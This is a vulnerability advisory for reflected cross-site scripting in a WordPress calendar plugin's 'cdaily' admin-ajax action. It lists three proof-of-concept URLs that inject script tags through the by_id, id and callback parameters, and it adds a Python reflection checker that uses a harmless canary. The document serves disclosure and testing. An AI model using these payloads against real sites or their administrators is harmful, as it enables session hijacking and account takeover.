The plugin does not sanitise and escape several request parameters (by_id, id and callback of the cdaily admin-ajax action) before outputting them back in the page, leading to Reflected Cross-Site Scripting which could be used against both unauthenticated and authenticated users (such as high-privilege ones like admin).
1. Create a new calendar in the plugin's settings page (most payloads below require at least one calendar to exist; payload 2 takes that calendar's ID in place of XX)
Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:
1. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(`xss`)</script>
2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(`xss`);</script>
3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(`xss`)</script>
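A reflection check for the three parameters above, added here as an example (it is not part of the advisory and not the plugin's own code). It replays the same admin-ajax.php request shapes with a harmless canary in place of the alert() payload and classifies each response as reflected unescaped, reflected escaped, or not reflected. The fetch callable is injected so the classification can be exercised offline; the staging URL and the response bodies in the usage are assumptions. For payload 1 the canary is appended to the advisory's by_id prefix (the traversal and %26_= part) so the request matches the PoC; whether that prefix is needed to reach the reflection is not stated on the page.

```python
"""Reflection check for the cdaily admin-ajax.php parameters.

Added example for this advisory, not the plugin's code. It sends the
three request shapes from the PoC with a harmless canary instead of
the alert() payload and reports how each value is echoed back.
"""
import html
import urllib.parse
import urllib.request

# (subaction, reflected parameter, other parameters the PoC URL carries,
#  prefix kept in front of the canary to mirror the PoC value)
REFLECTION_POINTS = [
    ("cd_displayday", "by_id", {"callback": "1", "bymethod": ""}, "/../../../../../../r&_="),
    ("cd_calendar", "id", {}, ""),
    ("cd_dismisshint", "callback", {}, ""),
]

# The canary carries a double quote and angle brackets so that both the
# attribute break-out of payload 2 ("><script>) and the comment/tag
# break-out of payloads 1 and 3 (--><script>, <script>) would be open
# if it comes back verbatim.
CANARY = 'xssprobe"<x>'


def build_url(base, subaction, param, extra, value=CANARY):
    """Build the admin-ajax.php URL for one reflection point."""
    query = {"action": "cdaily", "subaction": subaction}
    query.update(extra)
    query[param] = value
    return base.rstrip("/") + "/wp-admin/admin-ajax.php?" + urllib.parse.urlencode(query)


def classify(body, canary=CANARY):
    """Say how the canary came back in a response body."""
    if canary in body:
        return "reflected-unescaped"   # quote and brackets intact: exploitable context
    if html.escape(canary, quote=True) in body:
        return "reflected-escaped"     # output escaping in place
    return "not-reflected"


def http_fetch(url, timeout=10):
    """Default fetcher: anonymous GET, body decoded leniently (no cookies sent)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def scan(base, fetch=http_fetch):
    """Return {subaction: classification} for all three reflection points."""
    results = {}
    for subaction, param, extra, prefix in REFLECTION_POINTS:
        url = build_url(base, subaction, param, extra, prefix + CANARY)
        results[subaction] = classify(fetch(url))
    return results


if __name__ == "__main__":
    import sys
    # Usage (assumed staging host): python check.py https://staging.example.com
    for name, verdict in scan(sys.argv[1]).items():
        print(f"{name}: {verdict}")
```

A "reflected-unescaped" verdict means the parameter is echoed with its quote and angle brackets intact, which is the precondition the alert() payloads above rely on; after a fix all three points should report "reflected-escaped" or "not-reflected". The default fetcher sends no cookies, so it only exercises the unauthenticated path; pass a fetcher that adds a logged-in session cookie to check the authenticated one as well.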